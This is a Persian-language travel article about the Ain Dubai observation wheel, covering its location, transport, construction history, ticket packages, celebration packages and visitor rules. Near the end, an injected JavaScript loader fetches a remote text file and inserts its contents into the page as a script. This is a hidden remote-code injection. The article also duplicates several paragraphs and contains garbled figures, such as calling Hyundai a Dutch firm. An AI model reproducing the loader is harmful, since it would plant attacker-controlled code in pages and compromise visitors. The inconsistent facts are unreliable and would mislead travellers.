چشم دبی

  • شهر مدرن دبی در امارات متحده عربی در حاشیه جنوبی خلیج فارس، با وجود آسمان‌خراش‌های بلند و اجرای پروژه‌های بلند‌پروازانه، یکی از برترین مقاصد گردشگری خاورمیانه به شمار می‌آید. چرخ و فلک دبی، یکی از جدیدترین جاهای دیدنی دبی است؛ سازه‌ای که عنوان عظیم‌ترین و مرتفع‌ترین چرخ‌ و‌ فلک در جهان ( چشم دبی ) را به خود اختصاص داده است.

    تجربه بازدید از «عین دبی» به‌قدری هیجان‌انگیز است که در‌ کمتر از یک سال از افتتاح، صدها هزار نفر را به‌سمت خود کشاند؛ چشم‌اندازی جادویی در ارتفاع ۲۷۰ متری از شهر دبی و تمام سازه‌های غول‌پیکر آن که در زمان غروب خورشید، به اوج جلوه‌گری خود می‌رسد. دسترسی به این مجموعه بسیار آسان است و می‌توانید با استفاده از سرویس حمل و نقل عمومی خود را به آن برسانید؛ به‌علاوه شما دسترسی راحتی به سایر دیدنیهای دبی از این چرخ و فلک خواهید داشت. در ادامه با ما همراه باشید تا شما را با تمام اطلاعات مربوط به چرخ و فلک دبی مانند ارتفاع، ظرفیت، تاریخچه ساخت، انواع بلیط و شرایط بازدید از آن آشنا کنیم.

    چشم دبی

    چرخ و فلک دبی در جزیره بلوواترز (Bluewaters Island) در جنوب غرب دبی (در منطقه دبی مارینا و آب‌های خلیج فارس) و در فاصله ۲۴ کیلومتری (۲۲ دقیقه‌ای) مرکز شهر واقع شده است. عین دبی تا ابوظبی، پایتخت امارات متحده عربی نیز ۱۲۰ کیلومتر (۷۰ دقیقه) فاصله دارد. این جاذبه در ۵۰۰ متری اقامتگاه ساحلی جمیرا و در نزدیکی دبی مارینا در شهر دبی قرار گرفته است.

    جزیره بلوواترز از جزایر مصنوعی دبی است که در نوامبر سال ۲۰۱۸ افتتاح شد. این جزیره با وجود اقامتگاه‌ها و ریزورت‌های لوکس و مجلل (مانند سیزارز پلس)، بخش‌های تفریحی مانند «روتوندا» (محلی در کاخ سزار برای اجرای نمایش، کنسرت و غیره)، رستوران‌های بی‌نظیر مانند «دِ لاندن پراجکت» (The London Project) و فروشگاه و همچنین سیستم حمل و نقل هوشمند بدون راننده، در حال حاضر گردشگران و تاجران بسیاری (بیش از سه میلیون نفر در سال) را به‌سمت خود می‌کشاند و از جاهای دیدنی محبوب دبی به شمار می‌آید.

    مسیر دسترسی چرخ و فلک دبی

    • مسیر پیاده: از سمت «اقامتگاه تفریحی ساحل جمیرا» (Jumeriah Beach Residence) و از طریق پل عابر پیاده «دِ وارف لینک» (The Wharf Link) با حدود ۲۰ دقیقه پیاده‌روی به چرخ و فلک دبی می‌رسید. شما همچنین می‌توانید از گزینه‌های دیگر مانند اسکوتر برقی و دوچرخه نیز برای طی کردن این مسیر استفاده کنید.
    • خودرو: اگر در دبی خودرو اجاره کنید، به‌راحتی از طریق جاده شیخ زائد می‌توانید خود را به عین دبی برسانید.
    • تاکسی آبی: یکی از بهترین وسایل حمل و نقل برای دسترسی به چرخ و فلک دبی، تاکسی‌های آبی هستند که از روی دریا شما را به این جاذبه می‌رسانند. این تاکسی‌ها از ساعت هفت تا ۲۲ فعال هستند.
    • مترو: شما می‌توانید از طریق ایستگاه متروی داماک (Damac Metro Station) با ۹ دقیقه پیاده‌روی یا ایستگاه مترو «دبی مارینا مال» (Dubai Marina Mall) با ۱۲ دقیقه پیاده‌روی خود را به چرخ و فلک دبی برسانید.
    چشم دبی

    چرخ‌ و فلک دبی که با نام «عین دبی» به‌معنی چشم دبی شهرت دارد، بزرگ‌ترین و بلندترین چرخ‌وفلک جهان است که در تاریخ ۲۱ اکتبر ۲۰۲۱ افتتاح شد. این چرخ و فلک غول‌پیکر از آن دسته جاذبه‌هایی است که در سفر به دبی، به‌هیچ‌وجه نباید بازدید از آن را از دست دهید. چرخ‌ و فلک دبی با ۲۷۰ متر ارتفاع، ۴۸ کابین (هر کپسول با ظرفیت ۴۰ نفر) و درمجموع گنجایش ۱,۷۵۰ نفر را دارد.‌ 

    درون کابین‌های چرخ و فلک امکانات ویژه‌ای از قبیل کاناپه‌های نرم و راحت، میز، تهویه هوا، کفپوش‌های چوبی و غیره تعبیه شده‌اند. به‌علاوه، در هر کابین برای حفظ ایمنی افراد، یک دستگاه مخابره داخلی، سنسورهای آتش‌نشانی و دوربین‌های مداربسته و همچنین تجهیزات ایمنی، تجهیزات نجات، کپسول‌های آتش‌نشانی و یک دستگاه الکتروشوک وجود دارد.

    با سوار شدن در کابین‌های چرخ و فلک دبی منظره‌ای خیره‌کننده از شهر، چشم‌اندازی ۳۶۰ درجه از خط افق دبی و جاذبه‌هایی چون برج‌العرب (یکی از بلندترین هتل‌های جهان)، برج‌الخلیفه (بلندترین ساختمان جهان)، جزیره نخل جمیرا (مجموعه‌ای از جزایر مصنوعی شبیه نخل) و… پیش روی چشمان شما قرار می‌گیرد.

    عین دبی در جزیره بلوواترز قرار دارد و وجود امکانات تفریحی و رفاهی مناسب در اطراف آن، محبوبیت آن را در میان گردشگران افزایش داده است. از جمله این امکانات می‌توان به سرویس بهداشتی، پارکینگ، رستوران، کافی‌شاپ، فروشگاه، مسجد، داروخانه، هتل و اقامتگاه اشاره کرد. البته باید بدانید که هزینه اقامت در هتل‌ها و اقامتگاه‌های این جزیره بالا است و شما برای اقامتی مقرون‌به‌صرفه، می‌توانید به هتل‌ها و اقامتگاه‌های خارج از جزیره در شهر دبی بروید.

    بزرگ‌ترین چرخ‌ و فلک‌های جهان

    چشم دبی

    در ادامه شما را با بزرگ‌ترین چرخ‌ و فلک‌های جهان آشنا خواهیم کرد تا متوجه شوید که عین دبی در مقایسه با آن‌ها چقدر عظیم است.

    • های رولر لاس وگاس: این چرخ‌ و‌ فلک ۱۶۷ متری با ۲۸ کابین کروی و ۴۰ نفر ظرفیت در سال ۲۰۱۴ افتتاح شد.
    • چرخ و فلک سنگاپور: این جاذبه مشهور با ارتفاع ۱۶۴ متر با ۲۸ کابین و ۲۸ نفر ظرفیت در سال ۲۰۰۸ افتتاح شد.
    • چرخ و فلک ستاره نانچانگ: این چرخ و فلک با ۱۶۰ متر ارتفاع در شهر بازی نانچانگ واقع شده و دارای ۶۰ کابین با ظرفیت هشت نفر است. چرخ و فلک ستاره نانچانگ در سال ۲۰۰۶ آغاز به کار کرد. 
    • چرخ و فلک چشم لندن: چشم لندن با ارتفاع ۱۳۵ متر در سال ۲۰۰۰ افتتاح شد و تا مدت‌ها عنوان بلندترین چرخ‌ و فلک جهان را داشت. این چرخ‌ و فلک با ۳۲ کابین (نمادی از ۳۲ منطقه لندن) قابلیت حمل ۲۵ مسافر را دارد و هر دور آن نیم ساعت زمان می‌برد.
    • چرخ و فلک اسب سرخ: این جاذبه در اوساکای ژاپن ۱۲۳ متر ارتفاع دارد و از سال ۲۰۱۶ افتتاح شده است.
    • چرخ و فلک چشم اورلاندو: این چرخ و فلک در ایالت فلوریدا قرار دارد و با ارتفاع ۱۲۲ متر در سال ۲۰۱۵ افتتاح شد.
    • چرخ و فلک ستاره ملبورن: این چرخ و فلک با ۱۲۰ متر ارتفاع در کنار چرخ‌ و فلک‌های فوکوکا در ژاپن، ژنگژو در چین، چانگشا در چین، تیاجین در چین و سوژو در چین از بزرگ‌ترین چرخ‌ و فلک‌های جهان به شمار می‌رود.

    سازنده چرخ و فلک دبی

    خبر ساخت جزیره بلوواترز پس از تایید محمد بن راشد آل مکتوم، نخست‌وزیر امارات و حاکم دبی، در ۱۳ فوریه ۲۰۱۳ اعلام شد. این پروژه در ماه مه ۲۰۱۳ کلید خورد و در نوامبر ۲۰۱۸ افتتاح شد. سازنده چرخ و فلک دبی، شرکت هلندی مهندسی و ساخت‌وساز هیوندای و مهندسی استارنت (Hyundai Engineering and Construction) است که به‌عنوان پیمانکاران اصلی، طراحی و ساخت آن را با الهام از چرخ و فلک معروف «چشم لندن» آغاز کردند. از آنجا که این سازه عظیم قرار بود روی یک جزیره مصنوعی احداث شود، باید در ابتدا جزیره لایروبی و خاک آن مستحکم می‌شد تا با روش‌های نوآورانه بستری مناسب برای ساخت این چرخ و فلک عظیم ایجاد شود. این پروسه حدود دو سال زمان برد.

    پروژه ساخت چرخ و فلک دبی از ماه مه ۲۰۱۵ آغاز شد و در اواسط سال ۲۰۱۹ به پایان رسید. قرار بود این جاذبه هم‌زمان با اکسپو ۲۰۲۰ دبی افتتاح شود؛ اما به‌دلیل همه‌گیری کووید ۱۹ در سراسر جهان، افتتاح آن به تعویق افتاد و یک سال بعد در تاریخ ۲۱ اکتبر ۲۰۲۱ بازگشایی شد.

    جالب است بدانید هزینه ساخت عین دبی، چیزی در حدود ۲۷۰ میلیون دلار برآورد شده است. روی این سازه عظیم، ۸۰ متر صفحه نمایش ال‌ای‌دی نصب شده است؛ پلتفرمی الکترونیکی که مناسب پخش تبلیغات و سایر اطلاعات است.

    چرخ و فلک دبی در ابتدا به‌دلیل شباهت به چشم لندن (چرخ و فلک مشهور پایتخت انگلستان) با نام «چشم دبی» (Dubai Eye) شهرت یافت؛ این عنوان پس از گذشت مدت زمان کوتاهی به Dubai-I تغییر پیدا کرد و پس از آن استفاده از حرف شانزدهم در عربی که به‌عنوان «چشم» تلفظ می‌شود، به عین دبی نهایی شد.

    چشم دبی

    چرخ و فلک دبی، تقریبا دو برابر چرخ و فلک لندن ارتفاع دارد و در ساخت آن بیش از ۱۱,۲۰۰ هزار تن فولاد به‌کار رفته است تا ۱۹۲ کابل به طول ۲,۴۰۰ کیلومتر در کنار هم نگه داشته شوند. برای درک بزرگی این سازه بهتر است بدانید که فاصله بین قاهره و دبی حدود ۲,۴۰۰ کیلومتر است و میزان فولاد به کار رفته در آن، ۲۵ درصد بیشتر از فولادی است که برای ساخت برج ایفل به کار رفته است.

    پروژه ساخت چرخ و فلک دبی از ماه مه ۲۰۱۵ آغاز شد و در اواسط سال ۲۰۱۹ به پایان رسید. قرار بود این جاذبه هم‌زمان با اکسپو ۲۰۲۰ دبی افتتاح شود؛ اما به‌دلیل همه‌گیری کووید ۱۹ در سراسر جهان، افتتاح آن به تعویق افتاد و یک سال بعد در تاریخ ۲۱ اکتبر ۲۰۲۱ بازگشایی شد.

    جالب است بدانید هزینه ساخت عین دبی، چیزی در حدود ۲۷۰ میلیون دلار برآورد شده است. روی این سازه عظیم، ۸۰ متر صفحه نمایش ال‌ای‌دی نصب شده است؛ پلتفرمی الکترونیکی که مناسب پخش تبلیغات و سایر اطلاعات است.

    چرخ و فلک دبی در ابتدا به‌دلیل شباهت به چشم لندن (چرخ و فلک مشهور پایتخت انگلستان) با نام «چشم دبی» (Dubai Eye) شهرت یافت؛ این عنوان پس از گذشت مدت زمان کوتاهی به Dubai-I تغییر پیدا کرد و پس از آن استفاده از حرف شانزدهم در عربی که به‌عنوان «چشم» تلفظ می‌شود، به عین دبی نهایی شد.

    وزن چرخ و فلک دبی حدود ۱۰,۰۰۰ تن (بیش از هشت ایرباس A۳۸۰s) است؛ به‌طوری که برای سرپا نگهداشتن آن از پایه‌های ۷۰,۰۰ تنی استفاده کرده‌اند. علاوه بر این، جالب است بدانید وزن هر یک از اسپوک‌های (پره چرخ) چرخ و فلک دبی، پنج تن و طول هرکدام از آن‌ها بیشتر از یک زمین فوتبال است. 

    عین دبی به‌لحاظ امنیت و استحکام از بهترین سازه‌ها در این شهر و حتی در جهان است؛ زیرا در برابر طوفان‌های شن و زلزله‌های شدید، بسیار مقاوم است و همه کابین‌های آن مجهز به یک دستگاه ژنراتور برق اضطراری هستند. این مجموعه با بیش از ۹,۰۰۰,۰۰۰ ساعت کار کارگران و کارمندان ساخته شده است.

    چشم دبی

    چرخ و فلک دبی عنوان «سازه‌ای بی‌سابقه در دنیای مهندسی» را از آن خود کرده و نام چشم دبی برازنده آن است؛ زیرا زمانی که از فاصله دور به آن بنگرید، گویی در حال تماشای یک چشم بسیار بزرگ هستید. پیش‌بینی می‌شود سالانه بیش از یک تا سه میلیون نفر از چرخ و فلک دبی دیدن کنند.

    بلیط چرخ و فلک دبی

    بلیط‌های چشم دبی در سه پکیج مختلف «کابین‌های خصوصی» (Private Cabins)، «کابین‌های مشاهده» (Observation Cabins) و «بلیط خانوادگی» (Family Pass) با امکانات و قیمت‌های متنوع به علاقه‌مندان ارائه می‌شوند؛ پکیج‌هایی که برای بازدید عادی، برگزاری جشن‌ها، مراسم و جلسات خاص در طول روز یا عصرگاه مناسب هستند. 

    چشم دبی

    قیمت بلیط چرخ و فلک دبی برای بزرگسالان از ۱۳۰ درهم امارات آغاز می‌شود و بسته به پکیج انتخابی شما متغیر است. قیمت بلیط برای کودکان سه تا ۱۲ سال ارزان‌تر و ورود کودکان زیر سه سال به مجموعه چرخ و فلک دبی رایگان است. بازدید از این مجموعه حدود ۴۰ دقیقه زمان می‌برد. هزینه بازدید از عین دبی ممکن است کمی زیاد به نظر برسد؛ با این وجود، تجربه‌ای در این جاذبه برای شما رقم خواهد خورد که هیچ‌گاه فراموش نخواهید کرد. 

    کابین مشاهده چشم دبی

    «کابین مشاهده» ارزان‌ترین پکیج مجموعه عین دبی است که با خرید بلیط آن می‌توانید مناظر زیبایی از دبی و چشم‌اندازی بی‌نظیر در ارتفاع را تماشا کنید و عکس‌های زیبا بگیرید. امکان نشستن یا دور زدن در کابین‌های مشاهده چرخ و فلک دبی وجود دارد.

    کابین‌های مشاهده مجهز به سیستم تهویه هوای مطبوع و وای‌فای رایگان هستند. بلیط این پکیج از ۱۳۰ درهم امارات آغاز می‌شود.

    چشم دبی

    کابین‌های خانوادگی برای دورهمی‌های دوستانه یا خانوادگی مناسب هستند. امکان نشستن یا دور زدن در کابین‌های خانوادگی چرخ و فلک دبی وجود دارد. این کابین‌ها مجهز به سیستم تهویه هوای مطبوع و وای‌فای رایگان هستند. کابین‌های خانوادگی برای دو نفر بزرگسال (بالای ۱۲ سال که حداقل یکی از آن‌ها باید بالای ۲۱ سال باشد) و دو کودک سه تا ۱۲ سال طراحی شده‌اند و در صورت اضافه شدن افراد، باید هزینه اضافی پرداخت شود. بلیط این پکیج از ۳۷۰ درهم امارات آغاز می‌شود و امکان دسترسی به نوشیدنی‌ها در داخل کابین وجود دارد.

    کابین ویژه یا خصوصی گران‌ترین پکیج چرخ و فلک دبی است که شامل چندین گزینه مختلف می‌شود. در ادامه شما را با انواع کابین‌های ویژه عین دبی و امکانات آن آشنا خواهیم کرد.

    کابین ویژه یا خصوصی معمولی

    با تهیه بلیط کابین ویژه یا خصوصی معمولی می‌توانید یک کابین را با سیستم تهویه هوای مطبوع و خدمات ویژه، به‌صورت اختصاصی در اختیار داشته باشید. قیمت بلیط کابین ویژه از ۱,۵۵۰ درهم امارات آغاز می‌شود. در ساعت‌های خلوت، ۱۰ نفر می‌توانند در کابین ویژه چرخ و فلک دبی سوار شوند؛ این عدد در ساعت‌های شلوغی به ۲۰ نفر در هر کابین نیز می‌رسد.

    چشم دبی

    در کابین پرایوت پلاس، یک کارت هدیه ۵۰۰ درهمی در ساعت‌های خلوت (دو ظهر، سه عصر، هشت و ۹ شب) یا یک کارت ۱۰۰۰ درهمی در ساعت‌های شلوغی (چهار، ۶ و هفت عصر) در اختیار شما قرار می‌گیرد. از این کارت هدیه می‌توانید در رستوران‌ها و کافه‌های مجموعه استفاده کنید. با خرید این پکیج، در سالن ورودی از شما استقبال ویژه به عمل می‌آید؛ به‌علاوه امکان سفارش انواع غذا و نوشیدنی در کابین (با تحویل مستقیم) وجود دارد. قیمت بلیط کابین پرایوت پلاس از ۱,۸۰۰ درهم امارات آغاز می‌شود. 

    کابین پرایوت اسکای بار (Private Skybar)

    اگر به‌دنبال یک تجربه خاص و منحصربه‌فرد هستید، باید بلیط کابین پرایوت اسکای بار را تهیه کنید. در این کابین گروه‌های ۱۰ تا ۲۰ نفره می‌توانند از تماشای چشم‌ اندازهای خارق‌العاده از دبی به‌همراه سرو دو نوشیدنی خاص (کوکتل) توسط یک باریستای حرفه‌ای لذت ببرند. این نوع کابین‌ها به سیستم تهویه هوای مطبوع و وای‌فای رایگان مجهز هستند و امکان پخش موسیقی در آن‌ها وجود دارد. افراد زیر ۱۶ سال برای حضور در کابین پرایوت اسکای بار باید یک همراه بالای ۲۱ سال داشته باشند. توجه داشته باشید که در ساعت‌های شلوغ، ممکن است برای تهیه بلیط این نوع کابین کمی معطل شوید. قیمت بلیط کابین پرایوت اسکای بار از ۳,۸۰۰ درهم امارات آغاز می‌شود. 

    کابین پریمیوم پرایوت (Premium Private)

    پکیج کابین پریمیوم پرایوت شامل استقبال و سرو یک نوشیدنی در سالن ورودی و سرو دو نوشیدنی در داخل کابین می‌شود. این نوع کابین‌ها برای گروه‌های ۱۰ تا ۱۶ نفره‌ای مناسب هستند که به خدمات لاکچری علاقه دارند. قیمت هر بلیط کابین پریمیوم پرایوت از ۴,۰۰۰ درهم امارات آغاز می‌شود. 

    کابین پریمیوم پرایوت بابلی (Premium Private Bubbly)

    در پکیج پریمیوم پرایوت بابلی تجربه‌ای لوکس و منحصربه‌فرد روی صندلی‌های راحت، چرمی و ممتاز در کابینی مجلل برای شما رقم خواهد خورد. این کابین‌ها برای گروه‌های ۱۰ تا ۱۶ نفر مناسب هستند. پکیج کابین پریمیوم پرایوت بابلی شامل استقبال و سرو یک نوشیدنی در سالن ورودی و سرو دو نوشیدنی در داخل کابین است و قیمت بلیط آن از ۴,۷۰۰ درهم امارات آغاز می‌شود. 

    کابین خصوصی به‌همراه سرو منوی سه بخشی (پیش غذا، غذای اصلی و دسر) در سالن استراحت

    خرید بلیط کابین خصوصی به‌همراه سرو منوی سه بخشی در سالن استراحت به گروه‌های حداکثر ۱۵ نفره توصیه می‌شود؛ البته می‌توان تعداد مهمان‌ها را تا ۲۵ نفر نیز افزایش داد. در این پکیج پس از گردش ۳۸ دقیقه‌ای در کابین مجلل چرخ و فلک دبی و تماشای چشم‌انداز و خط افق دبی، می‌توانید از پیش غذا، غذای اصلی و دسر و همچنین نوشیدنی به تعداد نامحدود در سالن استراحت (برای دو ساعت) لذت ببرید. قیمت این پکیج از ۹,۰۰۰ درهم امارات آغاز می‌شود.

    کابین خصوصی به‌همراه سرو منوی چهار بخشی (اسنک، پیش غذا، غذای اصلی و دسر) در سالن استراحت

    خرید بلیط کابین خصوصی به‌همراه سرو منوی چهار بخشی در سالن استراحت برای گروه‌های حداکثر ۱۵ نفره مناسب است؛ البته می‌توان این تعداد را تا ۲۵ نفر نیز افزایش داد. در این پکیج پس از گردش ۳۸ دقیقه‌ای در کابین لوکس چرخ و فلک دبی و تماشای مناظر جاهای دیدنی دبی و خط افق شهر، می‌توانید انواع اسنک‌ها، پیش غذا، غذای اصلی و دسر و همچنین نوشیدنی به تعداد نامحدود را در سالن استراحت (برای دو ساعت) امتحان کنید. قیمت این پکیج از ۱۰,۰۰۰ درهم امارات آغاز می‌شود.

    کابین خصوصی به‌همراه سرو منوی پنج بخشی (پیش غذا، سوپ، غذای اصلی، پنیر و دسر) در سالن استراحت

    خرید بلیط کابین خصوصی به‌همراه سرو منوی پنج بخشی در سالن استراحت برای گروه‌های حداکثر ۱۵ نفره‌ای مناسب است که به‌دنبال تجربه لاکچری هستند؛ البته شما می‌توانید در قالب گروه‌های پنج نفره نیز از این پکیج استفاده کنید. در این پکیج پس از گردش در کابین لاکچری چرخ و فلک دبی و تماشای چشم‌اندازی خارق‌العاده از شهر، می‌توانید از انواع پیش غذا، سوپ، غذای اصلی، پنیر و دسر و همچنین نوشیدنی به تعداد نامحدود در سالن استراحت (برای دو ساعت) لذت ببرید. قیمت این پکیج از ۱۱,۰۰۰ درهم امارات آغاز می‌شود.

    چشم دبی


    امکانات چرخ و فلک دبی

    چشم دبی امکانات ویژه‌ای برای برگزاری انواع جشن‌ها و مراسم را برای علاقه‌مندان فراهم می‌کند. در ادامه برخی از امکانات این مجموعه را به شما معرفی خواهیم کرد.

    برگزاری جشن عروسی

    در مجموعه چرخ و فلک دبی، امکان برگزاری جشن عروسی با تعداد ۱۰ تا ۴,۰۰۰ مهمان وجود دارد. گروه‌های برنامه‌ریزی عروسی، عکاسان، گروه موسیقی زنده، طراحان با تزیینات منحصربه‌فرد و کارکنان حرفه‌ای این مجموعه با سرو انواع غذاها و نوشیدنی‌های لذیذ، جشنی مجلل و به‌یادماندنی را برای شما در بزرگ‌ترین چرخ و فلک جهان فراهم می‌کنند.

    رگزاری جشن سالگرد یا مراسم خواستگاری

    در کابین‌های خصوصی چرخ و فلک دبی، امکان برگزاری جشن سالگرد یا مراسم خواستگاری با انواع تزیینات شمع، گل و کیک به‌همراه پخش موسیقی و سرو غذا، شکلات، انواع میوه مانند توت‌فرنگی و غیره وجود دارد؛ تجربه‌ای فراموش نشدنی برای زوج‌های عاشق. هزینه برگزاری جشن سالگرد یا مراسم خواستگاری در این مجموعه از ۳,۵۰۰ درهم امارات آغاز می‌شود.

    برگزاری جشن تولد

    برگزاری جشن تولد در چرخ و فلک دبی شامل هشت پکیج مختلف می‌شود؛ سه پکیج نقره‌ای، طلایی و پریمیوم کودکان، پکیج نوجوانان، سه پکیج نقره‌ای، طلایی و پریمیوم بزرگسالان و پکیج سفارشی. 

    پکیج نقره‌ای کودکان با سرو کیکی یک کیلوگرمی و انواع نوشیدنی، تزیینات و پخش موسیقی از حدود ۲۵۰۰ درهم امارات آغاز می‌شود؛ در حالی که پکیج طلایی با سرو کیکی یک کیلوگرمی، انواع نوشیدنی و اسنک‌های خوشمزه، تزیینات، چهار عکس چاپ شده، فایل‌های دیجیتالی عکس‌ها و پخش موسیقی برای ۱۰ مهمان بیش از ۳,۹۵۰ درهم امارات هزینه دارد. پکیج پریمیوم تولد کودکان با هزینه بیش از ۶,۰۰۰ درهم امارات، علاوه بر امکانات پکیج طلایی، دارای خدماتی چون سرو چای و قهوه، اسنک و غذا برای بزرگسالان حاضر در تولد و طراحی دعوت‌نامه دیجیتال برای مهمانان است.

    جشن تولد مخصوص نوجوانان با پذیرایی با انواع نوشیدنی در سالن ورودی آغاز می‌شود و در کابین خصوصی چرخ و فلک در ارتفاع ۲۵۰ متری ادامه پیدا می‌کند. این پکیج با سرو یک کیک یک کیلوگرمی، انواع نوشیدنی و اسنک‌های خوشمزه، تزیینات، چهار عکس چاپ شده، فایل‌های دیجیتالی عکس‌ها و پخش موسیقی، حدود ۶,۳۰۰ درهم امارات برای شما هزینه دارد.

    پکیج تولد نقره‌ای بزرگسالان با امکان دعوت از ۱۰ مهمان، سرو یک کیک یک کیلوگرمی و نوشیدنی، تزیینات، پخش موسیقی و اجرای کلیپ انتخابی شما از صفحه تلویزیون داخل کابین چرخ و فلک، تجربه‌ای منحصربه‌فرد را برای شما رقم خواهد زد. در پکیج طلایی علاوه بر امکانات ذکر شده، خدماتی چون سرو نوشیدنی در سالن ورودی قبل از سوار شدن در چرخ و فلک، سرو غذا در کابین و چهار عکس چاپ شده و فایل‌های دیجیتالی عکس‌ها در اختیار شما قرار می‌گیرد.

    قیمت این پکیج از ۶,۷۰۰ درهم امارات آغاز می‌شود. پکیج پریمیوم تولد بزرگسالان با هزینه بیش از ۹۰۰۰ درهم امارات، خدمات بیشتری چون تزیینات ویژه و دستگاه کارائوکی برای سرگرمی بیشتر مهمانان را به شما پیشنهاد می‌دهد.

    برگزاری مهمانی‌های ناهار یا شام با تم‌های مختلف

    مهمانی پیتزا، تعیین جنسیت، پنیر و انگور و مهمانی کارائوکی از مهمانی‌های ناهار یا شام با تم‌های مختلف در مجموعه چرخ و فلک دبی هستند که در کابین‌های خصوصی این چرخ و فلک برگزار می‌شوند. هزینه این مهمانی‌ها از ۴,۵۰۰ تا ۱۵,۷۵۰ درهم متغیر است.

    شرایط بازدید از چرخ و فلک دبی

    • مجموعه چرخ و فلک دبی پس از افتتاح همه‌روزه به‌جز سه‌شنبه‌ها، از ساعت ۱۳ تا ۲۲ باز بود؛ اما در تاریخ ۱۴ مارس ۲۰۲۲ به‌دلیل تعمیرات دوره‌ای بسته شد. قرار بود که عین دبی پس از ماه رمضان در عید فطر بازگشایی شود؛ اما به احتمال زیاد تا پایان تابستان ۲۰۲۲ بسته بماند. تاریخ دقیق بازگشایی چرخ و فلک دبی مشخص نیست؛ بنابراین بهتر است که قبل از سفر به وب‌سایت این مجموعه مراجعه و از باز بودن آن، اطمینان حاصل کنید.
    • یکی از برنامه‌های آینده و پرطرفدار چرخ و فلک دبی، برگزاری جشن سال نوی کریسمس ۲۰۲۳ است. مهمانان با رزرو کابین‌های خود می‌توانند چشم‌اندازی خارق‌العاده از آتش‌بازی‌های دبی در شب سال نو را تماشا کنند و خاطره‌ای فراموش‌نشدنی برای خود و عزیزانشان بسازند.
    چشم دبی
    • چرخ و فلک دبی با سرعت مناسبی می‌چرخد؛ به همین دلیل خانم‌های باردار نیز می‌توانند سوار آن شوند.
    • در نظر داشته باشید که در داخل کابین‌ها سرویس بهداشتی وجود ندارد؛ پس بهتر است قبل از سوار شدن، از سرویس بهداشتی داخل محوطه استفاده کنید.
    • به‌جز سگ‌های کمک‌رسان، ورود حیوانات خانگی به داخل کابین‌ها ممنوع است.
    • مجموعه عین دبی دارای پارکینگ اختصاصی نیست؛ با این وجود می‌توانید ماشین خود را در محوطه بلوواترز پارک کنید.
    • به‌همراه داشتن کیسه‌های کوچک دستی و کوله‌های کوچک در داخل کابین‌های چرخ و فلک مشکلی ندارد.
    • عین دبی هیچ‌گونه امکاناتی برای نگهداری کیف یا چمدان ندارد؛ پس به شما پیشنهاد می‌کنیم که در حین بازدید از این جاذبه، چمدان یا کیف بزرگ به‌همراه نداشته باشید.
    • به‌همراه داشتن ابزار و وسایل نوک تیز و مواد قابل اشتعال ممنوع است.
    • سیگار کشیدن در داخل کابین‌های عین دبی ممنوع است.
    • هیچ قانونی درباره نحوه لباس پوشیدن در این مجموعه وجود ندارد.
    • شما نمی‌توانید نوشیدنی‌ها و خوراکی‌هایی که از سایر فروشگاه‌ها خریداری کرده‌اید را با خود به داخل کابین‌های چرخ و فلک ببرید.
    چشم دبی
    • خرید بلیط چشم دبی به‌صورت آنلاین و حضوری امکان‌پذیر است؛ البته پیشنهاد می‌کنیم در صورت امکان،برای مدیریت زمان و معطلی کمتر، بلیط آنلاین بخرید.
    • قیمت بلیط‌های تماشای غروب آفتاب، کابین خانوادگی، کابین خصوصی و غیره با توجه به نوع و امکانات هر کابین مشخص می‌شود.
    • در تعطیلات، جمعیت بسیاری برای بازدید از چرخ و فلک دبی به جزیره بلوواترز می‌آیند؛ پس بهتر است که در اواسط هفته از این مجموعه دیدن کنید.
    • مراحل بازرسی و ورود به کابین‌ها حدود ۴۰ دقیقه تا یک ساعت زمان می‌برد؛ پس سعی کنید از یک‌ ساعت زودتر در مجموعه حاضر شوید.
    • در مدت زمان ۳۸ دقیقه‌ای گردش چرخ و فلک دبی، استفاده از خوراکی مجاز است.
    • توان‌یابان و افرادی که از ویلچر استفاده می‌کنند نیز می‌توانند از چرخ و فلک دبی دیدن کنند.
    • در هر ۴۸ اتاقک چرخ و فلک عین دبی، ظرفیت حمل ۴۰ نفر وجود دارد؛ اما به‌دلیل شرایط کرونایی در هر کابین حداکثر ۱۰ نفر سوار می‌شوند.
    • پوشیدن ماسک برای همه بازدیدکنندگان عین دبی در داخل کابین الزامی است.
    • کارکنان مجموعه با دستگاه‌های تب سنج، تب حاضران را به‌طور مرتب بررسی می‌کنند.
    • هر کابین قبل از استفاده مهمانان، به‌طور کامل تمیز می‌شود و اقدامات مبتنی بر پیشگیری از انتشار ویروس کووید ۱۹ نیز در این مکان به‌صورت دائم در حال اجرا است.
    • فاصله‌گذاری اجتماعی (دو متر) در این مجموعه رعایت می‌شود. برای اطمینان از حفظ سلامت همه افراد حاضر در مجموعه، برچسب‌هایی روی زمین تعبیه شده است تا افراد در فاصله‌های مناسب از یکدیگر بایستند و فاصله اجتماعی را رعایت کنند. به‌علاوه قانون فاصله ۳ متری در بخش کافه‌ها و رستوران‌های سالن Seaview نیز اجرا می‌شود.
    • کارکنان مجموعه عین دبی به‌طور مداوم از ماسک صورت استفاده می‌کنند و رعایت فاصله اجتماعی و الزامات بهداشتی از ضروریات این مجموعه است.
    • مجموعه چرخ و فلک عین دبی برای اطمینان از حفظ سلامت مهمانان خود امکاناتی چون تهیه ماسک یک‌بارمصرف و ضدعفونی‌کننده دست در سراسر مرکز، سیستم فروش بلیط آنلاین برای کاهش تجمع و ازدحام افراد، وجود موانع فیزیکی بین مهمانان و کارکنان فروش بلیط، تشویق به پرداخت بدون تماس دست و با کارت و دستگاه‌های الکترونیکی برای سفارش غذا و نوشیدنی در سالن را نیز فراهم کرده است.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید